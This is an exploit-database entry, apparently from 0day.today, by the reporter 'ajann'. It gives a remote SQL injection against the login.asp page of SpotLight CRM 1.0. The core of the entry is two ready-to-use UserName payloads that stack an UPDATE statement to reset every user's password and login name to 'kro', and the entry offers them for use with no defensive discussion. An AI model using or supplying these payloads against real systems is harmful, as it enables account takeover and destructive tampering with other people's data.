SpotLight CRM 1.0 (login.asp) Remote SQL Injection Vulnerability

2006-12-09T00:00:00
ID 1337DAY-ID-1247
Type zdt
Reporter ajann
Modified 2006-12-09T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ================================================================
SpotLight CRM 1.0 (login.asp) Remote SQL Injection Vulnerability
================================================================


*************************************************************************************
# Title   :  SpotLight CRM 1.0 (login.asp) | Remote SQL Injection Vulnerability
# Author  :   ajann
# Contact :   :(
# $$$     :  $2,499

*************************************************************************************


[[SQL]]]

###http://[target]/[path]//login.asp=[POST SQL]

Example:
-> All User UserName And Password Changed "kro"

// login.asp UserName: ';update login set password='kro'--
// login.asp UserName: ';update login set loginName='kro'--

[[/SQL]]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!



#  0day.today [2018-04-14]  #